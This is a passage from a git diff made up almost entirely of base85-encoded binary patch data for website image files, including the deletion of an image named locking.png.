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

diff --git a/website/src/static/img/locking.png b/website/src/static/img/locking.png
deleted file mode 100644
index abedf9917605b64dbbefb177188c6cf626c3f101..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 15521
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
